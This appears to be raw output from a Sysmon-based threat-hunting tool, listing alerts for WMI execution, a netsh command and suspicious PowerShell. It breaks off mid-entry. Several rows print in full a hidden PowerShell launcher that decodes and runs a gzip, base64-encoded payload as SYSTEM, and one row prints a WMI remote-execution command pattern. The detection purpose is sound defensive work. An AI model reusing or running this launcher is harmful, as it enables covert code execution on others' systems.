747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421225 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.675 747F3D96-75D1-5F8B-0000-001061BD3300 4864 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 9808 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:51.965 365ABB72-AF8B-5CC8-0000-0010AC1B1900 3872 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-2586-5CC9-0000-0020E7030000 0x3e7 0 System SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-AF8B-5CC8-0000-00101C1A1900 3348 C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1," 1 5 4 1 0 0x8000000000000000 4946 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.273 747F3D96-6646-5D3F-0000-0010A7318B00 4148 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh trace show status C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," 1 5 4 1 0 0x8000000000000000 9808 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:51.965 365ABB72-AF8B-5CC8-0000-0010AC1B1900 3872 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-2586-5CC9-0000-0020E7030000 0x3e7 0 System SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-AF8B-5CC8-0000-00101C1A1900 3348 C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 